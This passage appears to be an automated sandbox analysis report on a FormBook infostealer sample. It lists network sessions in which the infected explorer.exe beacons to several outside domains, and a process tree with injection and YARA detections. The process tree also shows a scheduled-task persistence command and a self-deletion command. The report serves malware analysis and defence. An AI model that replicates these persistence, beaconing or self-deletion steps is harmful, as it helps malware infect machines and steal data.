23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 0d 0a 20 20 20
                                                        Data Ascii: 14c6<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.2249169195.77.116.880C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:12.313704967 CEST8OUTGET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.iptechcm.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:12.386595964 CEST9INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Mon, 27 Sep 2021 15:39:12 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 808
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Last-Modified: Fri, 09 Oct 2020 08:38:37 GMT
                                                        ETag: "328-5b138dffc24c6"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.2249170217.160.0.22280C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:17.484231949 CEST10OUTGET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.pizza-mio.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:17.509183884 CEST11INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Content-Length: 601
                                                        Connection: close
                                                        Date: Mon, 27 Sep 2021 15:39:17 GMT
                                                        Server: Apache
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.224917134.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:22.562083006 CEST12OUTGET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.wwiilive.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:22.675501108 CEST12INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Mon, 27 Sep 2021 15:39:22 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "6142f053-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.224917281.169.145.7780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:27.779182911 CEST13OUTGET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.play-to-escape.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:27.804255962 CEST13INHTTP/1.1 404 Not Found
                                                        Date: Mon, 27 Sep 2021 15:39:27 GMT
                                                        Server: Apache/2.4.49 (Unix)
                                                        Content-Length: 196
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.22491735.101.152.16180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:32.950460911 CEST14OUTGET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.yhomggsmtdynchb.store
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:33.020418882 CEST15INHTTP/1.1 404 Not Found
                                                        Server: nginx-reuseport/1.21.1
                                                        Date: Mon, 27 Sep 2021 15:39:33 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 292
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 34 61 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 68 6f 6d 67 67 73 6d 74 64 79 6e 63 68 62 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /u4an/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.yhomggsmtdynchb.store Port 80</address></body></html>


                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: ejecutable2.exe PID: 2548 Parent PID: 1232

                                                        General

                                                        Start time:17:37:21
                                                        Start date:27/09/2021
                                                        Path:C:\Users\user\Desktop\ejecutable2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\ejecutable2.exe'
                                                        Imagebase:0x1120000
                                                        File size:834048 bytes
                                                        MD5 hash:2D359D2C999CCB15BC71229BB0275BB6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.424438137.000000000265F000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Analysis Process: schtasks.exe PID: 2848 Parent PID: 2548

                                                        General

                                                        Start time:17:37:25
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
                                                        Imagebase:0x990000
                                                        File size:179712 bytes
                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: ejecutable2.exe PID: 2528 Parent PID: 2548

                                                        General

                                                        Start time:17:37:26
                                                        Start date:27/09/2021
                                                        Path:C:\Users\user\Desktop\ejecutable2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\ejecutable2.exe
                                                        Imagebase:0x1120000
                                                        File size:834048 bytes
                                                        MD5 hash:2D359D2C999CCB15BC71229BB0275BB6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: explorer.exe PID: 1764 Parent PID: 2528

                                                        General

                                                        Start time:17:37:27
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0xffa10000
                                                        File size:3229696 bytes
                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: wscript.exe PID: 2584 Parent PID: 1764

                                                        General

                                                        Start time:17:37:51
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wscript.exe
                                                        Imagebase:0xab0000
                                                        File size:141824 bytes
                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                        Analysis Process: cmd.exe PID: 2640 Parent PID: 2584

                                                        General

                                                        Start time:17:37:57
                                                        Start date:27/09/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\ejecutable2.exe'
                                                        Imagebase:0x49fd0000
                                                        File size:302592 bytes
                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >